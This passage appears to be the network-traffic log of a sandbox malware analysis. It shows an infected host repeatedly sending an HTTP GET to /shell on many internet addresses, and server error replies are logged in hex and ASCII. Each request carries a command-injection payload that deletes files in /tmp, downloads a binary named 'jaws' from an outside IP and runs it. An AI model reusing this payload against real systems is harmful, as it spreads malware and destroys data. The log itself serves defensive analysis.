                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          625192.168.2.2347106194.8.215.9080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:39.116050959 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:39.362153053 CET758INHTTP/1.0 307 Temporary Redirect
                                                          Date: Tue, 02 Jan 2024 05:25:39 GMT
                                                          Server: xxxxxxxx-xxxxx
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          X-Frame-Options: SAMEORIGIN
                                                          Content-Security-Policy: frame-ancestors 'self'; object-src 'self'; script-src 'self' https: 'unsafe-eval' 'unsafe-inline' blob:;
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          Strict-Transport-Security: max-age=31536000
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 31 32 37 2e 30 2e 30 2e 31 3a 34 34 33 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 22 3e 68 65 72 65 3c 2f 41 3e 2e 3c 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>307 Temporary Redirect</TITLE></HEAD><BODY><H1>Temporary Redirect</H1>The document has moved <A HREF="https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+">here</A>.<P></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          626192.168.2.235015681.45.23.21580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:39.133512974 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:39.396606922 CET516INHTTP/1.0 400 Bad Request
                                                          Content-Type: text/html
                                                          Content-Length: 349
                                                          Connection: close
                                                          Date: Tue, 02 Jan 2024 05:25:26 GMT
                                                          Server: lighttpd/1.4.41
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          627192.168.2.2349008178.159.46.9180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:39.173695087 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:39.477005005 CET1286INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.2
                                                          Date: Tue, 02 Jan 2024 05:25:37 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 3650
                                                          Connection: keep-alive
                                                          ETag: "59bf8f7f-e42"
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000
                                                          Jan 2, 2024 06:25:39.477018118 CET1286INData Raw: 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20
                                                          Data Ascii: ; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-siz
                                                          Jan 2, 2024 06:25:39.477029085 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20
                                                          Data Ascii: <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpag
                                                          Jan 2, 2024 06:25:39.477039099 CET18INData Raw: 68 74 6d 6c 3e 0a
                                                          Data Ascii: html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          628192.168.2.233896244.215.139.22880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:42.024127960 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:42.181484938 CET262INHTTP/1.1 301 Moved Permanently
                                                          Server: Server
                                                          Date: Tue, 02 Jan 2024 05:25:42 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 163
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Jan 2, 2024 06:25:42.181713104 CET175INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>Server</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          629192.168.2.2357174211.149.152.3780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:42.230065107 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:44.098109007 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:44.461208105 CET195INHTTP/1.1 302 Object moved
                                                          Server: infosec/1.0.0
                                                          Location: http://stopinfo.vhostgo.com/info5.html?data=127.0.0.1
                                                          Connection: close
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 0
                                                          Jan 2, 2024 06:25:44.461654902 CET321INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.24.0
                                                          Date: Tue, 02 Jan 2024 05:25:44 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          630192.168.2.233531635.183.50.13980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:42.350383997 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          631192.168.2.233772243.192.122.6580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:42.403228998 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:42.782346964 CET321INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.22.1
                                                          Date: Tue, 02 Jan 2024 05:25:42 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          632192.168.2.2339926195.210.122.20680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:42.425488949 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:42.670298100 CET495INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:42 GMT
                                                          Server: Apache/2.4.56 (Debian)
                                                          Content-Length: 301
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at 127.0.0.1 Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          633192.168.2.2336618119.23.86.14980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:42.547024012 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:44.162076950 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:44.480139971 CET371INHTTP/1.1 403 Forbidden
                                                          Server: Tengine
                                                          Date: Tue, 02 Jan 2024 05:25:44 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 221
                                                          Connection: keep-alive
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr/>Powered by Tengine<hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          634192.168.2.234784023.63.254.14980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:42.582550049 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:42.935225010 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:25:42 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:42 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 32 64 36 31 33 61 26 23 34 36 3b 31 37 30 34 31 37 33 31 34 32 26 23 34 36 3b 36 32 32 34 31 62 64 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;42d613a&#46;1704173142&#46;62241bd8</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          635192.168.2.2335776170.130.122.6480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:42.642199993 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:42.786087036 CET322INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:47 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          636192.168.2.234713052.35.155.16680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:42.678668976 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          637192.168.2.234679062.24.144.16580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:42.725214005 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
